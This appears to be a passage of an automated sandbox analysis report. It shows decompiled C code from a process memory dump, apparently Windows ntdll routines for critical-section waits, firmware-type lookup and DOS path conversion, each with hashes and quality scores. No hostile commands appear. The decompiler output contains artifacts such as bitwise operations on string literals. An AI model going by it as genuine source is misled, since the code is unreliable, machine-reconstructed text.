                                          					_push(_t103);
                                          					E00F597C0();
                                          				}
                                          				if( *0x10079c4 != 0) {
                                          					_t57 = 0;
                                          				} else {
                                          					_t57 = 0x10079c8;
                                          				}
                                          				_v16 = _t57;
                                          				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                          					_t93 = _t109;
                                          					L23();
                                          				}
                                          				_t58 =  *_t109;
                                          				if(_t58 == _t103) {
                                          					__eflags =  *(_t109 + 0x14) & "RegLoadRegistryInfo";
                                          					_t58 = _t103;
                                          					if(__eflags == 0) {
                                          						_t93 = _t109;
                                          						E00F41624(_t86, __eflags);
                                          						_t58 =  *_t109;
                                          					}
                                          				}
                                          				_v20 = _v20 & 0x00000000;
                                          				if(_t58 != _t103) {
                                          					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                          				}
                                          				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                          				_t88 = _v16;
                                          				_v28 = _t104;
                                          				L9:
                                          				while(1) {
                                          					if(E00F37D50() != 0) {
                                          						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                          					} else {
                                          						_t62 = 0x7ffe0382;
                                          					}
                                          					if( *_t62 != 0) {
                                          						_t63 =  *[fs:0x30];
                                          						__eflags = _t63[0x240] & 0x00000002;
                                          						if((_t63[0x240] & 0x00000002) != 0) {
                                          							_t93 = _t109;
                                          							E00FAFE87(_t93);
                                          						}
                                          					}
                                          					if(_t104 != 0xffffffff) {
                                          						_push(_t88);
                                          						_push(0);
                                          						_push(_t104);
                                          						_t64 = E00F59520();
                                          						goto L15;
                                          					} else {
                                          						while(1) {
                                          							_t97 =  &_v8;
                                          							_t64 = E00F4E18B(_t109 + 4, _t97, 4, _t88, 0);
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t93 =  *(_t109 + 4);
                                          							_v8 = _t93;
                                          							if((_t93 & 0x00000002) != 0) {
                                          								continue;
                                          							}
                                          							L15:
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t89 = _v24;
                                          							if(_t64 < 0) {
                                          								L00F6DF30(_t93, _t97, _t64);
                                          								_push(_t93);
                                          								_t98 = _t97 | 0xffffffff;
                                          								__eflags =  *0x1006901;
                                          								_push(_t109);
                                          								_v52 = _t98;
                                          								if( *0x1006901 != 0) {
                                          									_push(0);
                                          									_push(1);
                                          									_push(0);
                                          									_push(0x100003);
                                          									_push( &_v12);
                                          									_t72 = E00F59980();
                                          									__eflags = _t72;
                                          									if(_t72 < 0) {
                                          										_v12 = _t98 | 0xffffffff;
                                          									}
                                          								}
                                          								asm("lock cmpxchg [ecx], edx");
                                          								_t111 = 0;
                                          								__eflags = 0;
                                          								if(0 != 0) {
                                          									__eflags = _v12 - 0xffffffff;
                                          									if(_v12 != 0xffffffff) {
                                          										_push(_v12);
                                          										E00F595D0();
                                          									}
                                          								} else {
                                          									_t111 = _v12;
                                          								}
                                          								return _t111;
                                          							} else {
                                          								if(_t89 != 0) {
                                          									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                          									_t77 = E00F37D50();
                                          									__eflags = _t77;
                                          									if(_t77 == 0) {
                                          										_t64 = 0x7ffe0384;
                                          									} else {
                                          										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                          									}
                                          									__eflags =  *_t64;
                                          									if( *_t64 != 0) {
                                          										_t64 =  *[fs:0x30];
                                          										__eflags = _t64[0x240] & 0x00000004;
                                          										if((_t64[0x240] & 0x00000004) != 0) {
                                          											_t78 = E00F37D50();
                                          											__eflags = _t78;
                                          											if(_t78 == 0) {
                                          												_t64 = 0x7ffe0385;
                                          											} else {
                                          												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                          											}
                                          											__eflags =  *_t64 & 0x00000020;
                                          											if(( *_t64 & 0x00000020) != 0) {
                                          												_t64 = E00F97016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                          											}
                                          										}
                                          									}
                                          								}
                                          								return _t64;
                                          							}
                                          						}
                                          						_t97 = _t88;
                                          						_t93 = _t109;
                                          						E00FAFDDA(_t97, _v12);
                                          						_t105 =  *_t109;
                                          						_t67 = _v12 + 1;
                                          						_v12 = _t67;
                                          						__eflags = _t105 - 0xffffffff;
                                          						if(_t105 == 0xffffffff) {
                                          							_t106 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t106 =  *(_t105 + 0x14);
                                          						}
                                          						__eflags = _t67 - 2;
                                          						if(_t67 > 2) {
                                          							__eflags = _t109 - 0x1005350;
                                          							if(_t109 != 0x1005350) {
                                          								__eflags = _t106 - _v20;
                                          								if(__eflags == 0) {
                                          									_t93 = _t109;
                                          									E00FAFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                          								}
                                          							}
                                          						}
                                          						_push("RTL: Re-Waiting\n");
                                          						_push(0);
                                          						_push(0x65);
                                          						_v20 = _t106;
                                          						E00FA5720();
                                          						_t104 = _v28;
                                          						_t116 = _t116 + 0xc;
                                          						continue;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting$RegLoadRegistryInfo
                                          • API String ID: 0-3584235622
                                          • Opcode ID: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
                                          • Instruction ID: 230132cb03707dc29e397adc468d5f3953631a33d8de13c998b87937c80c5fb3
                                          • Opcode Fuzzy Hash: 4d9ded31138b85d91d586bd95360f0537a7e08ba4d07420340ebe0f426a933e3
                                          • Instruction Fuzzy Hash: 6D615331E006049FDB32DFA8E880BBE77A1EB40330F240279E855972C1C7389D85B781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E00F951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed short* _t63;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				signed int _t67;
                                          				intOrPtr _t74;
                                          				intOrPtr _t84;
                                          				intOrPtr _t88;
                                          				intOrPtr _t94;
                                          				void* _t100;
                                          				void* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				short* _t108;
                                          				signed int _t110;
                                          				signed int _t113;
                                          				signed int* _t115;
                                          				signed short* _t117;
                                          				void* _t118;
                                          				void* _t119;
                                          
                                          				_push(0x80);
                                          				_push(0xff05f0);
                                          				E00F6D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                          				_t115 =  *(_t118 + 0xc);
                                          				 *(_t118 - 0x7c) = _t115;
                                          				 *((char*)(_t118 - 0x65)) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          				_t113 = 0;
                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                          				_t100 = __ecx;
                                          				if(_t100 == 0) {
                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          					E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					 *((char*)(_t118 - 0x65)) = 1;
                                          					_t63 =  *(_t118 - 0x90);
                                          					_t101 = _t63[2];
                                          					_t64 =  *_t63 & 0x0000ffff;
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					L20:
                                          					_t65 = _t64 >> 1;
                                          					L21:
                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                          					if(_t108 == 0) {
                                          						L27:
                                          						 *_t115 = _t65 + 1;
                                          						_t67 = 0xc0000023;
                                          						L28:
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                          						L29:
                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                          						E00F953CA(0);
                                          						return E00F6D130(0, _t113, _t115);
                                          					}
                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                          							 *_t108 = 0;
                                          						}
                                          						goto L27;
                                          					}
                                          					 *_t115 = _t65;
                                          					_t115 = _t65 + _t65;
                                          					E00F5F3E0(_t108, _t101, _t115);
                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                          					_t67 = 0;
                                          					goto L28;
                                          				}
                                          				_t103 = _t100 - 1;
                                          				if(_t103 == 0) {
                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                          					_t74 = E00F33690(1, _t117, 0xef1810, _t118 - 0x74);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                          					_t101 = _t117[2];
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					if(_t74 < 0) {
                                          						_t64 =  *_t117 & 0x0000ffff;
                                          						_t115 =  *(_t118 - 0x7c);
                                          						goto L20;
                                          					}
                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                          					_t115 =  *(_t118 - 0x7c);
                                          					goto L21;
                                          				}
                                          				if(_t103 == 1) {
                                          					_t105 = 4;
                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                          					_push(_t118 - 0x70);
                                          					_push(0);
                                          					_push(0);
                                          					_push(_t105);
                                          					_push(_t118 - 0x78);
                                          					_push(0x6b);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = E00F5AA90();
                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          					_t113 = L00F34620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                          					if(_t113 != 0) {
                                          						_push(_t118 - 0x70);
                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                          						_push(_t113);
                                          						_push(4);
                                          						_push(_t118 - 0x78);
                                          						_push(0x6b);
                                          						_t84 = E00F5AA90();
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                          						if(_t84 < 0) {
                                          							goto L29;
                                          						}
                                          						_t110 = 0;
                                          						_t106 = 0;
                                          						while(1) {
                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                          							 *(_t118 - 0x88) = _t106;
                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                          								break;
                                          							}
                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                          							_t106 = _t106 + 1;
                                          						}
                                          						_t88 = E00F9500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                          						_t119 = _t119 + 0x1c;
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                          						if(_t88 < 0) {
                                          							goto L29;
                                          						}
                                          						_t101 = _t118 - 0x3c;
                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                          						goto L21;
                                          					}
                                          					_t67 = 0xc0000017;
                                          					goto L28;
                                          				}
                                          				_push(0);
                                          				_push(0x20);
                                          				_push(_t118 - 0x60);
                                          				_push(0x5a);
                                          				_t94 = E00F59860();
                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                          				if(_t94 < 0) {
                                          					goto L29;
                                          				}
                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                          					_t101 = L"Legacy";
                                          					_push(6);
                                          				} else {
                                          					_t101 = L"UEFI";
                                          					_push(4);
                                          				}
                                          				_pop(_t65);
                                          				goto L21;
                                          			}























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: d1e398ca897f3cbc9c07720242af9e9565d55673e8fc59e8a264cf5771b8aaff
                                          • Instruction ID: 2a78cda96501e88dd556c458aa46af25c07cf488310c2205a5442f324046d3d6
                                          • Opcode Fuzzy Hash: d1e398ca897f3cbc9c07720242af9e9565d55673e8fc59e8a264cf5771b8aaff
                                          • Instruction Fuzzy Hash: 29516E71E00A199FEF15DFA8C941BADB7F5FF48B40F24402DE649EB291D6719900EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00F34120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                          				signed int _v8;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v532;
                                          				char _v540;
                                          				signed short _v544;
                                          				signed int _v548;
                                          				signed short* _v552;
                                          				signed short _v556;
                                          				signed short* _v560;
                                          				signed short* _v564;
                                          				signed short* _v568;
                                          				void* _v570;
                                          				signed short* _v572;
                                          				signed short _v576;
                                          				signed int _v580;
                                          				char _v581;
                                          				void* _v584;
                                          				unsigned int _v588;
                                          				signed short* _v592;
                                          				void* _v597;
                                          				void* _v600;
                                          				void* _v604;
                                          				void* _v609;
                                          				void* _v616;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				unsigned int _t161;
                                          				signed int _t162;
                                          				unsigned int _t163;
                                          				void* _t169;
                                          				signed short _t173;
                                          				signed short _t177;
                                          				signed short _t181;
                                          				unsigned int _t182;
                                          				signed int _t185;
                                          				signed int _t213;
                                          				signed int _t225;
                                          				short _t233;
                                          				signed char _t234;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				signed int _t250;
                                          				void* _t251;
                                          				signed short* _t254;
                                          				void* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				signed short* _t260;
                                          				signed short _t265;
                                          				signed short* _t269;
                                          				signed short _t271;
                                          				signed short** _t272;
                                          				signed short* _t275;
                                          				signed short _t282;
                                          				signed short _t283;
                                          				signed short _t290;
                                          				signed short _t299;
                                          				signed short _t307;
                                          				signed int _t308;
                                          				signed short _t311;
                                          				signed short* _t315;
                                          				signed short _t316;
                                          				void* _t317;
                                          				void* _t319;
                                          				signed short* _t321;
                                          				void* _t322;
                                          				void* _t323;
                                          				unsigned int _t324;
                                          				signed int _t325;
                                          				void* _t326;
                                          				signed int _t327;
                                          				signed int _t329;
                                          
                                          				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                          				_v8 =  *0x100d360 ^ _t329;
                                          				_t157 = _a8;
                                          				_t321 = _a4;
                                          				_t315 = __edx;
                                          				_v548 = __ecx;
                                          				_t305 = _a20;
                                          				_v560 = _a12;
                                          				_t260 = _a16;
                                          				_v564 = __edx;
                                          				_v580 = _a8;
                                          				_v572 = _t260;
                                          				_v544 = _a20;
                                          				if( *__edx <= 8) {
                                          					L3:
                                          					if(_t260 != 0) {
                                          						 *_t260 = 0;
                                          					}
                                          					_t254 =  &_v532;
                                          					_v588 = 0x208;
                                          					if((_v548 & 0x00000001) != 0) {
                                          						_v556 =  *_t315;
                                          						_v552 = _t315[2];
                                          						_t161 = E00F4F232( &_v556);
                                          						_t316 = _v556;
                                          						_v540 = _t161;
                                          						goto L17;
                                          					} else {
                                          						_t306 = 0x208;
                                          						_t298 = _t315;
                                          						_t316 = E00F36E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                          						if(_t316 == 0) {
                                          							L68:
                                          							_t322 = 0xc0000033;
                                          							goto L39;
                                          						} else {
                                          							while(_v581 == 0) {
                                          								_t233 = _v588;
                                          								if(_t316 > _t233) {
                                          									_t234 = _v548;
                                          									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                          										_t254 = L00F34620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                          										if(_t254 == 0) {
                                          											_t169 = 0xc0000017;
                                          										} else {
                                          											_t298 = _v564;
                                          											_v588 = _t316;
                                          											_t306 = _t316;
                                          											_t316 = E00F36E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                          											if(_t316 != 0) {
                                          												continue;
                                          											} else {
                                          												goto L68;
                                          											}
                                          										}
                                          									} else {
                                          										goto L90;
                                          									}
                                          								} else {
                                          									_v556 = _t316;
                                          									 *((short*)(_t329 + 0x32)) = _t233;
                                          									_v552 = _t254;
                                          									if(_t316 < 2) {
                                          										L11:
                                          										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                          											_t161 = 5;
                                          										} else {
                                          											if(_t316 < 6) {
                                          												L87:
                                          												_t161 = 3;
                                          											} else {
                                          												_t242 = _t254[2] & 0x0000ffff;
                                          												if(_t242 != 0x5c) {
                                          													if(_t242 == 0x2f) {
                                          														goto L16;
                                          													} else {
                                          														goto L87;
                                          													}
                                          													goto L101;
                                          												} else {
                                          													L16:
                                          													_t161 = 2;
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										_t243 =  *_t254 & 0x0000ffff;
                                          										if(_t243 == 0x5c || _t243 == 0x2f) {
                                          											if(_t316 < 4) {
                                          												L81:
                                          												_t161 = 4;
                                          												goto L17;
                                          											} else {
                                          												_t244 = _t254[1] & 0x0000ffff;
                                          												if(_t244 != 0x5c) {
                                          													if(_t244 == 0x2f) {
                                          														goto L60;
                                          													} else {
                                          														goto L81;
                                          													}
                                          												} else {
                                          													L60:
                                          													if(_t316 < 6) {
                                          														L83:
                                          														_t161 = 1;
                                          														goto L17;
                                          													} else {
                                          														_t245 = _t254[2] & 0x0000ffff;
                                          														if(_t245 != 0x2e) {
                                          															if(_t245 == 0x3f) {
                                          																goto L62;
                                          															} else {
                                          																goto L83;
                                          															}
                                          														} else {
                                          															L62:
                                          															if(_t316 < 8) {
                                          																L85:
                                          																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                          																goto L17;
                                          															} else {
                                          																_t250 = _t254[3] & 0x0000ffff;
                                          																if(_t250 != 0x5c) {
                                          																	if(_t250 == 0x2f) {
                                          																		goto L64;
                                          																	} else {
                                          																		goto L85;
                                          																	}
                                          																} else {
                                          																	L64:
                                          																	_t161 = 6;
                                          																	goto L17;
                                          																}
                                          															}
                                          														}
                                          													}
                                          												}
                                          											}
                                          											goto L101;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									}
                                          									L17:
                                          									if(_t161 != 2) {
                                          										_t162 = _t161 - 1;
                                          										if(_t162 > 5) {
                                          											goto L18;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t162 * 4 +  &M00F345F8))) {
                                          												case 0:
                                          													_v568 = 0xef1078;
                                          													__eax = 2;
                                          													goto L20;
                                          												case 1:
                                          													goto L18;
                                          												case 2:
                                          													_t163 = 4;
                                          													goto L19;
                                          											}
                                          										}
                                          										goto L41;
                                          									} else {
                                          										L18:
                                          										_t163 = 0;
                                          										L19:
                                          										_v568 = 0xef11c4;
                                          									}
                                          									L20:
                                          									_v588 = _t163;
                                          									_v564 = _t163 + _t163;
                                          									_t306 =  *_v568 & 0x0000ffff;
                                          									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                          									_v576 = _t265;
                                          									if(_t265 > 0xfffe) {
                                          										L90:
                                          										_t322 = 0xc0000106;
                                          									} else {
                                          										if(_t321 != 0) {
                                          											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                          												if(_v580 != 0) {
                                          													goto L23;
                                          												} else {
                                          													_t322 = 0xc0000106;
                                          													goto L39;
                                          												}
                                          											} else {
                                          												_t177 = _t306;
                                          												goto L25;
                                          											}
                                          											goto L101;
                                          										} else {
                                          											if(_v580 == _t321) {
                                          												_t322 = 0xc000000d;
                                          											} else {
                                          												L23:
                                          												_t173 = L00F34620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                          												_t269 = _v592;
                                          												_t269[2] = _t173;
                                          												if(_t173 == 0) {
                                          													_t322 = 0xc0000017;
                                          												} else {
                                          													_t316 = _v556;
                                          													 *_t269 = 0;
                                          													_t321 = _t269;
                                          													_t269[1] = _v576;
                                          													_t177 =  *_v568 & 0x0000ffff;
                                          													L25:
                                          													_v580 = _t177;
                                          													if(_t177 == 0) {
                                          														L29:
                                          														_t307 =  *_t321 & 0x0000ffff;
                                          													} else {
                                          														_t290 =  *_t321 & 0x0000ffff;
                                          														_v576 = _t290;
                                          														_t310 = _t177 & 0x0000ffff;
                                          														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                          															_t307 =  *_t321 & 0xffff;
                                          														} else {
                                          															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                          															E00F5F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                          															_t329 = _t329 + 0xc;
                                          															_t311 = _v580;
                                          															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                          															 *_t321 = _t225;
                                          															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                          																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                          															}
                                          															goto L29;
                                          														}
                                          													}
                                          													_t271 = _v556 - _v588 + _v588;
                                          													_v580 = _t307;
                                          													_v576 = _t271;
                                          													if(_t271 != 0) {
                                          														_t308 = _t271 & 0x0000ffff;
                                          														_v588 = _t308;
                                          														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                          															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                          															E00F5F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                          															_t329 = _t329 + 0xc;
                                          															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                          															 *_t321 = _t213;
                                          															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                          																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                          															}
                                          														}
                                          													}
                                          													_t272 = _v560;
                                          													if(_t272 != 0) {
                                          														 *_t272 = _t321;
                                          													}
                                          													_t306 = 0;
                                          													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                          													_t275 = _v572;
                                          													if(_t275 != 0) {
                                          														_t306 =  *_t275;
                                          														if(_t306 != 0) {
                                          															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                          														}
                                          													}
                                          													_t181 = _v544;
                                          													if(_t181 != 0) {
                                          														 *_t181 = 0;
                                          														 *((intOrPtr*)(_t181 + 4)) = 0;
                                          														 *((intOrPtr*)(_t181 + 8)) = 0;
                                          														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                          														if(_v540 == 5) {
                                          															_t182 = E00F152A5(1);
                                          															_v588 = _t182;
                                          															if(_t182 == 0) {
                                          																E00F2EB70(1, 0x10079a0);
                                          																goto L38;
                                          															} else {
                                          																_v560 = _t182 + 0xc;
                                          																_t185 = E00F2AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                          																if(_t185 == 0) {
                                          																	_t324 = _v588;
                                          																	goto L97;
                                          																} else {
                                          																	_t306 = _v544;
                                          																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                          																	 *(_t306 + 4) = _t282;
                                          																	_v576 = _t282;
                                          																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                          																	 *_t306 = _t325;
                                          																	if( *_t282 == 0x5c) {
                                          																		_t149 = _t325 - 2; // -2
                                          																		_t283 = _t149;
                                          																		 *_t306 = _t283;
                                          																		 *(_t306 + 4) = _v576 + 2;
                                          																		_t185 = _t283 & 0x0000ffff;
                                          																	}
                                          																	_t324 = _v588;
                                          																	 *(_t306 + 2) = _t185;
                                          																	if((_v548 & 0x00000002) == 0) {
                                          																		L97:
                                          																		asm("lock xadd [esi], eax");
                                          																		if((_t185 | 0xffffffff) == 0) {
                                          																			_push( *((intOrPtr*)(_t324 + 4)));
                                          																			E00F595D0();
                                          																			L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                          																		}
                                          																	} else {
                                          																		 *(_t306 + 0xc) = _t324;
                                          																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                          																	}
                                          																	goto L38;
                                          																}
                                          															}
                                          															goto L41;
                                          														}
                                          													}
                                          													L38:
                                          													_t322 = 0;
                                          												}
                                          											}
                                          										}
                                          									}
                                          									L39:
                                          									if(_t254 !=  &_v532) {
                                          										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                          									}
                                          									_t169 = _t322;
                                          								}
                                          								goto L41;
                                          							}
                                          							goto L68;
                                          						}
                                          					}
                                          					L41:
                                          					_pop(_t317);
                                          					_pop(_t323);
                                          					_pop(_t255);
                                          					return E00F5B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                          				} else {
                                          					_t299 = __edx[2];
                                          					if( *_t299 == 0x5c) {
                                          						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                          						if(_t256 != 0x5c) {
                                          							if(_t256 != 0x3f) {
                                          								goto L2;
                                          							} else {
                                          								goto L50;
                                          							}
                                          						} else {
                                          							L50:
                                          							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                          								goto L2;
                                          							} else {
                                          								_t251 = E00F53D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                          								_pop(_t319);
                                          								_pop(_t326);
                                          								_pop(_t257);
                                          								return E00F5B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                          							}
                                          						}
                                          					} else {
                                          						L2:
                                          						_t260 = _v572;
                                          						goto L3;
                                          					}
                                          				}
                                          				L101:
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RegLoadRegistryInfo
                                          • API String ID: 0-282410176
                                          • Opcode ID: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
                                          • Instruction ID: 41ecab7f55eefd9f2253da5f99df06d00edfc5a958edb3376a846a4154afc031
                                          • Opcode Fuzzy Hash: fe44051aa3a2dfad77b44901159923bef983a584f279ed4ffc9b7451458994e4
                                          • Instruction Fuzzy Hash: 55F181719083118BC724CF59C481A3AB7E1FF98724F54896EF88ACB251E734EC95EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00F1B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                          				signed int _t65;
                                          				signed short _t69;
                                          				intOrPtr _t70;
                                          				signed short _t85;
                                          				void* _t86;
                                          				signed short _t89;
                                          				signed short _t91;
                                          				intOrPtr _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr* _t98;
                                          				signed short _t99;
                                          				signed short _t101;
                                          				void* _t102;
                                          				char* _t103;
                                          				signed short _t104;
                                          				intOrPtr* _t110;
                                          				void* _t111;
                                          				void* _t114;
                                          				intOrPtr* _t115;
                                          
                                          				_t109 = __esi;
                                          				_t108 = __edi;
                                          				_t106 = __edx;
                                          				_t95 = __ebx;
                                          				_push(0x90);
                                          				_push(0xfef7a8);
                                          				E00F6D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                          				if(__edx == 0xffffffff) {
                                          					L6:
                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                          					__eflags = _t65 & 0x00000002;
                                          					if((_t65 & 0x00000002) != 0) {
                                          						L3:
                                          						L4:
                                          						return E00F6D130(_t95, _t108, _t109);
                                          					}
                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                          					_t108 = 0;
                                          					_t109 = 0;
                                          					_t95 = 0;
                                          					__eflags = 0;
                                          					while(1) {
                                          						__eflags = _t95 - 0x200;
                                          						if(_t95 >= 0x200) {
                                          							break;
                                          						}
                                          						E00F5D000(0x80);
                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                          						_t108 = _t115;
                                          						_t95 = _t95 - 0xffffff80;
                                          						_t17 = _t114 - 4;
                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                          						__eflags =  *_t17;
                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t102 = _t110 + 1;
                                          						do {
                                          							_t85 =  *_t110;
                                          							_t110 = _t110 + 1;
                                          							__eflags = _t85;
                                          						} while (_t85 != 0);
                                          						_t111 = _t110 - _t102;
                                          						_t21 = _t95 - 1; // -129
                                          						_t86 = _t21;
                                          						__eflags = _t111 - _t86;
                                          						if(_t111 > _t86) {
                                          							_t111 = _t86;
                                          						}
                                          						E00F5F3E0(_t108, _t106, _t111);
                                          						_t115 = _t115 + 0xc;
